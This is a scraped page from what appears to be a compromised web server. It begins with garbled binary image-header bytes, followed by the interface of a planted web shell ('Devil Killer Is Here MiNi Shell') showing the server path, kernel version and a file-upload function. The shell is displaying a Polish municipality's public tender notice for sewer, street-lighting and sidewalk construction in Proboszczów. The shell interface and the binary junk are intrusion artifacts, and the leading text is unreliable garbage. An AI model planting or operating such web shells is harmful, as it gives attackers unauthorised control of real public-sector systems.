JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220816/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220816/0030620601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa kanalizacji, oświetlenia oraz chodnika na osiedlu w miejscowości Proboszczów w gminie Pielgrzymka </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Pielgrzymka</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 390647660</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Pielgrzymka 109A/1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pielgrzymka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-524</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">768775013</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@pielgrzymka.biz</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.pielgrzymka.biz</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa kanalizacji, oświetlenia oraz chodnika na osiedlu w miejscowości Proboszczów w gminie Pielgrzymka </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ae10e261-197a-11ed-b950-8227d40187e8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00306206</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00025775/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Wymiana kanalizacji sanitarnej, deszczowej (rozdzielenie ogólnospławnej), budowa oświetlenia drogowego, odtworzenie ciągów pieszych oraz jezdni drogi – osiedle mieszkaniowe w Proboszczowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pzp.pielgrzymka.biz/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w<br/>języku polskim na Platformie pod adresem: https://pzp.pielgrzymka.biz/ pod nazwą postępowania<br/>wskazaną w tytule SWZ.<br/>Ofertę składa się pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>Podmiotowe środki dowodowe, w tym oświadczenie, zobowiązanie podmiotu udostępniającego<br/>zasoby, oraz pełnomocnictwa, o których mowa w ust. 10 pkt 1÷3 Rozdział II SWZ, przekazuje się w<br/>postaci elektronicznej opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)<br/>Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, tj. bezpłatnie<br/>rejestrując się lub logując, w przypadku posiadania konta na Platformie, akceptuje warunki korzystania<br/>z Platformy, określone w regulaminie zamieszczonym na stronie internetowej<br/>https://pzp.pielgrzymka.biz/ oraz uznaje go za wiążący.<br/>2) Ogólne zasady korzystania z Platformy:<br/>a) zgłoszenie do postępowania wymaga zalogowania wykonawcy do systemu na subdomenie<br/>https://pzp.pielgrzymka.biz/,<br/>b) wykonawca aby przystąpić do postępowania musi założyć konto na Platformie<br/>https://pzp.pielgrzymka.biz/ gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia<br/>bezpłatnego konta; wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres<br/>e-mail, otrzymuje link aktywacyjny, a następnie ustanawia hasło,<br/>c) proces rejestracji wykonawcy jest w pełni automatyczny, po zarejestrowaniu należy podać dane firmy, którą osoba zakładająca<br/>konto reprezentuje,<br/>d) po założeniu konta wykonawca ma możliwość złożenia oferty w postępowaniu; komunikacja między<br/>zamawiającym a wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w<br/>formie elektronicznej za pośrednictwem Platformy, powiadomień mailowych.<br/>3) Zamawiający, zgodnie z § 3 Rozporządzenie Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (dalej jako &#34;Rozporządzenie&#34;) określa niezbędne wymagania<br/>sprzętowo - aplikacyjne umożliwiające pracę na Platformie, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV<br/>2GHZ, jeden z systemów operacyjnych - MS Windows 10, Mac Os x 10.4, Linux, lub ich nowsze<br/>wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa najlepiej najnowszej dostępnej wersji obsługująca<br/>TLS 1.2 z wyjątkiem Internet Explorer,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf,<br/>f) podłączony lub wbudowany do komputera czytnik karty kryptograficznej wydanej przez wystawcę<br/>certyfikatu używanego przez wykonawcę.<br/>4) Zamawiający, zgodnie z § 3 powołanego powyżej Rozporządzenia określa:<br/>a) dopuszczalne formaty przesyłanych danych, tj. plików o wielkości do 100 MB w formatach: .doc,<br/>.pdf, .zip,<br/>b) informacje na temat kodowania i czasu odbioru danych: plik załączony przez wykonawcę na<br/>Platformie i zapisany, widoczny jest w systemie, jako zaszyfrowany – format kodowania UTF8.<br/>Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez zamawiającego po upływie<br/>terminu składania ofert,<br/>c) oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss)<br/>generowany wg czasu Platformy, który jest synchronizowany ze znacznikiem czasu UTC,<br/>5) Wykonawca powinien dokładnie zapoznać się z niniejszą SWZ i złożyć ofertę zgodnie z określonymi<br/>wymaganiami.<br/>6) Wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje przekazywane będą elektronicznie<br/>za pośrednictwem dedykowanego formularza udostępnionego na Platformie:<br/>https://pzp.pielgrzymka.biz/.<br/>7) Dokumenty, podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia muszą być<br/>złożone w formie elektronicznej lub w postaci elektronicznej opatrzone podpisem zaufanym lub<br/>podpisem osobistym osoby upoważnionej do reprezentowania wykonawców zgodnie z formą<br/>reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym<br/>dokumencie oraz składane są przez wykonawcę za pośrednictwem formularza do komunikacji jako<br/>załączniki.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz.U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że: <br/>1)	Administratorem Pani/Pana danych osobowych jest Wójt Gminy Pielgrzymka, 59-524 Pielgrzymka 109A/1.<br/>2)	Administrator wyznaczył Inspektora Danych Osobowych: Karmina Jaślar, z którym można się kontaktować pod adresem e-mail: iod@pielgrzymka.tel , nr tel. 768775013 wew. 16.<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego: „Budowa kanalizacji, oświetlenia oraz chodnika na osiedlu w miejscowości Proboszczów w gminie Pielgrzymka”, Znak ZP.271.10.2022, prowadzonym w trybie art. 275 pkt 2 ustawy Pzp.<br/>4)	Odbiorcami przekazanych przez wykonawcę danych osobowych będą osoby lub podmioty, którym zostanie udostępniona dokumentacja postępowania zgodnie z art.74 ustawy Pzp, a także art. 6 ustawy z 6 września 2001 r. o dostępie do informacji publicznej.<br/>5)	Dane osobowe wykonawcy zawarte w protokole postępowania będą przechowywane przez okres 4 lat, od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. <br/>6)	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>7)	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>8)	Posiada Pani/Pan: <br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie Administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia),<br/>b)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników),<br/>c)	na podstawie art. 18 RODO prawo żądania od Administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego),<br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.10.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 1196621,98 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wymiana kanalizacji sanitarnej obejmuje wykonanie rurociągów PVC200 SDR34 SN8 oraz PVC160 SDR34 SN8 w technologii wykopu otwartego. <br/>Zadanie obejmuje następujące długości sieci kanalizacji sanitarnej: <br/>- długość całej inwestycji to 703,35 m,<br/>- sieć kanalizacyjna DN200mm PVC-U SN8 SDR34 długości 484,10 m,<br/>- przyłącza kanalizacyjne długości 277,60 m z czego: DN200mm PVC-U SN8 SDR34 długości 219,25 m, DN160mm PVC-U SN8 SDR34 długości 58,35m.<br/>Po ułożeniu rurociągów wykopy zostaną zasypane, a teren przywrócony do stanu pierwotnego i urządzony zgodnie z PZT (dojścia, chodniki, odtworzeniowo) . <br/>W zakresie jest montaż 12 kpl. studni rewizyjnych betonowych DN1200, 16 kpl. studni rewizyjnych betonowych DN600, 6 kpl. studni DN425, 2 kolana kanalizacyjne zewnętrzne kielichowe DN200 15 st. oraz przepięcie istniejących przyłączy kanalizacyjnych. <br/>Likwidacja istniejącej sieci kanalizacji sanitarnej będącej w kolizji z projektowanym rurociągiem. Projektowane rurociągi i kształtki jako rury kielichowe PVC lite, klasy SN8 SDR 34, łączone na uszczelkę gumową. Na powierzchni terenu pozostaną widoczne włazy kanalizacyjne. <br/>Po wykonaniu prac montażowych oraz po dokonaniu prób, sprawdzeń i odbiorów nawierzchnię drogi należy odtworzyć na szerokość wykopu. Konstrukcja podbudowy i nawierzchni drogi musi nawiązywać do istniejącej konstrukcji drogi i być wykonana z pełnowartościowych materiałów. <br/>Konstrukcja nawierzchni chodnika oraz zjazdów z kostki betonowej: <br/>- kostka betonowa typu holland kolor szary – 6 cm,<br/>- podsypka cementowo-piaskowa 1:4 – 3 cm, <br/>- podbudowa zasadnicza z betonu cementowego – 17cm, <br/>- podłoże doprowadzone do G1 Emin &gt;=80 MPa,<br/>- na połączeniu z terenem zielonym obrzeże chodnikowe 6x30x100cm z oporem. <br/>Konstrukcja nawierzchni jezdni oraz zjazdów z betonu asfaltowego: <br/>- warstwa ścieralna z betonu asfaltowego – 4 cm <br/>- wiązanie międzywarstwowe z emulsji asfaltowej, szybkorozpadowej C60 BP3 ZM o zużyciu 0,3 kg/m2 <br/>- istniejącą nawierzchnia z betonu asfaltowego lub odtworzona konstrukcja po wykopie <br/>na połączenie jezdni z chodnikiem za pomocą krawężnika drogowego 15x30x100 cm na ławie betonowej z oporem z betonu C12/15<br/><br/>Budowa oświetlenia drogowego obejmuje m.in.:<br/>- montaż szafki oświetlenia ulicznego, <br/>- dwa obwody oświetleniowe łącznej długości ok. 858 m, kabel typu YAKY 4x35 mm2, ułożony w rurze osłonowej typu DVK 75 na gł. 0,5 m, przewierty/przeciski na gł. 1,1 m AROT SRS 110 mm,<br/>- 19 słupy oświetleniowe aluminiowe anodowane typu SAL-70K,<br/>- wysięgniki anodowane pojedyncze i podwójne typu WR-8a/1/1,0/5,<br/>- 22 oprawy oświetleniowe na bazie opraw typu CUddle II LED REG 48 5000K DW. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45220000-5 - Roboty inżynieryjne i budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45316100-6 - Instalowanie urządzeń oświetlenia zewnętrznego</p> <p class="mb-0">45317300-5 - Elektryczne elektrycznych urządzeń rozdzielczych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór najkorzystniejszej oferty z możliwością prowadzenia negocjacji<br/>a) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością prowadzenia negocjacji, o której mowa w Art. 275 pkt 2<br/>ustawy Pzp.<br/>b) W przypadku podjęcia decyzji o prowadzeniu negocjacji w pierwszym kroku Zamawiający poinformuje równocześnie wszystkich<br/>wykonawców, którzy złożyli oferty, o Wykonawcach:<br/>których oferty nie zostały odrzucone, oraz punktacji przyznanej ofertom w każdym kryterium oceny ofert i łącznej punktacji,<br/>- których oferty zostały odrzucone,<br/>- którzy nie zostali zakwalifikowani do negocjacji oraz punktacji przyznanej ich ofertom w każdym kryterium oceny ofert i łącznej<br/>punktacji, w przypadku, o którym mowa w art. 288 ust. 1 - podając uzasadnienie faktyczne i prawne.<br/>c) Zamawiający korzysta z uprawnienia, o jakim stanowi art. 288 ust. 1 ustawy Pzp w kwestii dotyczącej ograniczenia liczby<br/>Wykonawców, których zaprosi do negocjacji ofert. W przypadku podjęcia decyzji o przeprowadzeniu negocjacji, Zamawiający<br/>działając z mocy art. 288 ust. 1 ustawy Pzp ograniczy, stosując kryteria oceny ofert, liczbę wykonawców zaproszonych do negocjacji<br/>do trzech Wykonawców, których oferty spełniają w najwyższym stopniu te kryteria.<br/>d) Oferta Wykonawcy niezaproszonego do negocjacji uznaje się za odrzuconą.<br/>e) Jeżeli liczba wykonawców, którzy w odpowiedzi na ogłoszenie o zamówieniu złożyli oferty niepodlegające odrzuceniu, jest<br/>mniejsza niż 3, Zamawiający w przypadku, o którym mowa w art. 275 pkt 2 ustawy Pzp, kontynuuje postępowanie.<br/>f) Zamawiający zaprosi jednocześnie wykonawców do negocjacji ofert złożonych w odpowiedzi na ogłoszenie o zamówieniu, jeżeli<br/>nie podlegały one odrzuceniu.<br/>g) Zamawiający w zaproszeniu do negocjacji wskaże miejsce, termin i sposób prowadzenia negocjacji oraz kryteria oceny ofert, w<br/>ramach których będą prowadzone negocjacje w celu ulepszenia treści ofert.<br/>h) Prowadzone negocjacje mają poufny charakter. Zamawiający udostępnia oferty wraz z załącznikami złożone w odpowiedzi na<br/>ogłoszenie o zamówieniu niezwłocznie po otwarciu tych ofert, nie później jednak niż w terminie 3 dni od dnia ich otwarcia. Żadna ze<br/>stron nie może, bez zgody drugiej strony, ujawniać informacji technicznych i handlowych związanych z negocjacjami. Zgoda jest<br/>udzielana w odniesieniu do konkretnych informacji i przed ich ujawnieniem.<br/>i) Zamawiający informuje równocześnie wszystkich wykonawców, których oferty złożone w odpowiedzi na ogłoszenie o zamówieniu<br/>nie zostały odrzucone, o zakończeniu negocjacji oraz zaprasza ich do składania ofert dodatkowych.<br/>j) Zaproszenie do złożenia ofert dodatkowych będzie zawierać co najmniej:<br/> nazwę oraz adres Zamawiającego, numer telefonu, adres poczty elektronicznej oraz strony internetowej prowadzonego<br/>postępowania;<br/> sposób i termin składania ofert dodatkowych oraz język lub języki, w jakich muszą one być sporządzone, oraz termin otwarcia tych<br/>ofert.<br/>k) Zamawiający wyznaczy termin na złożenie ofert dodatkowych z uwzględnieniem czasu potrzebnego na przygotowanie tych ofert,<br/>z tym że termin ten nie będzie krótszy niż 5 dni od dnia przekazania zaproszenia do składania ofert dodatkowych.<br/>l) Wykonawca może złożyć ofertę dodatkową, która zawiera nowe propozycje w zakresie treści oferty podlegających ocenie w<br/>ramach kryteriów oceny ofert wskazanych przez Zamawiającego w zaproszeniu do negocjacji.<br/>m) Oferta dodatkowa nie może być mniej korzystna w żadnym z kryteriów oceny ofert wskazanych w zaproszeniu do negocjacji niż<br/>oferta złożona w odpowiedzi na ogłoszenie o zamówieniu<br/>n) Oferta przestaje wiązać Wykonawcę w zakresie, w jakim złoży on ofertę dodatkową zawierającą korzystniejsze propozycje w<br/>ramach każdego z kryteriów oceny ofert wskazanych w zaproszeniu do negocjacji.<br/>o) Oferta dodatkowa, która jest mniej korzystna w którymkolwiek z kryteriów oceny ofert wskazanych w zaproszeniu do negocjacji niż<br/>oferta złożona w odpowiedzi na ogłoszenie o zamówieniu, podlega odrzuceniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub 